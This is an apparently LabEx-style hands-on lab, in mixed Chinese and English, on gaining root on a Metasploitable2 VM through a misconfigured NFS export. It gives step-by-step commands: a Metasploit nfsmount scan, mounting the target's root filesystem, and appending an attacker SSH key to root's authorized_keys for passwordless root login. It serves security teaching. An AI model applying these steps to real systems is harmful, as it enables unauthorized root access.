利用 NFS 错误配置通过 Nmap 获取 Root 权限

介绍

Network File System (NFS) is a distributed file system protocol that allows users to access remote files as if they were local. However, improper configuration of NFS can lead to severe security vulnerabilities, allowing attackers to gain unauthorized access to the system. In this lab, you will learn how to exploit NFS misconfiguration to gain root access to a target machine.

The goal of this lab is to understand the risks associated with NFS misconfiguration and learn how to perform a successful NFS-based attack. By the end of the lab, you will have gained hands-on experience in identifying NFS shares, mounting them locally, and leveraging the misconfiguration to obtain root privileges on the target system.

扫描 NFS 共享

In this step, you will use the Metasploit Framework to scan the target machine for NFS shares.

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:

sudo virsh start Metasploitable2

等待目标机器启动，可能需要 1-3 分钟。

2. Test the connectivity to the target machine by pinging it:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

3. Launch the Kali Linux container and enter the bash environment by running:

docker run -ti --network host --privileged b5b709a49cd5 bash

There is an extra --privileged parameter, which is used so that the root inside the container has real root privileges, otherwise the root inside the container is just a normal user with external privileges. Starting a container with the --privileged parameter will allow you to see many of the devices on the host and perform a mount, and will even allow you to start docker containers within docker containers.

4. Inside the Kali container, test the network connection to the target machine:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

5. Now, launch the Metasploit console:

cd ~
msfconsole

6. In the Metasploit console, use the auxiliary/scanner/nfs/nfsmount module to scan for NFS shares:

use auxiliary/scanner/nfs/nfsmount

set rhosts 192.168.122.102

set threads 5

show options

exploit

This module will scan the target system and display any exported NFS shares.

Press Ctrl+D to quit the Metasploit console then start the inspection

挂载 NFS 共享

在这一步中，你将在 Kali 容器中挂载 NFS 根共享。

首先，安装 nfs-common 包：

cd /
apt-get install -y nfs-common

挂载 NFS 根共享：

mount -t nfs -o nolock 192.168.122.102:/ /mnt

该命令将目标系统的根目录 (/) 挂载到 Kali 容器的 /mnt 目录。

通过列出 /mnt 目录的内容来验证 NFS 共享是否正确挂载：

ls /mnt

你应该会看到目标系统根目录的内容。

创建 SSH 密钥对

在这一步中，你将创建一个 SSH 密钥对，以便无需密码即可通过 SSH 访问目标系统。

生成 SSH 密钥对：

ssh-keygen -t rsa -b 4096 -f /root/.ssh/id_rsa

该命令将创建两个文件：/root/.ssh/id_rsa（私钥）和 /root/.ssh/id_rsa.pub（公钥）。

启用无密码 SSH 访问

在这一步中，你将把公钥添加到目标系统的授权密钥文件中，从而启用免密码 SSH 访问。

将公钥复制到目标系统的授权密钥文件中：

cat /root/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys

该命令会将你的公钥文件内容追加到目标系统的 /root/.ssh/authorized_keys 文件中。

获取 root 权限

在这一步中，你将使用免密码 SSH 访问以 root 用户身份登录目标系统。

使用 SSH 连接到目标系统：

ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss root@192.168.122.102

现在你应该可以在目标系统上获得一个 root shell，而无需输入密码。

总结

在本实验中，你学习了如何利用 NFS 配置错误来获取对目标系统的未授权 root 访问权限。你首先使用 Metasploit Framework 扫描 NFS 共享，然后在本地机器上挂载了 NFS 根共享。接着，你创建了一个 SSH 密钥对，并将公钥添加到目标系统的授权密钥文件中，从而启用了免密码 SSH 访问。最后，你使用免密码 SSH 访问以 root 用户身份登录了目标系统。

本实验展示了正确配置 NFS 共享的重要性，以及配置错误可能带来的潜在风险。通过了解这些漏洞，你可以更好地保护你的系统，防范潜在的攻击。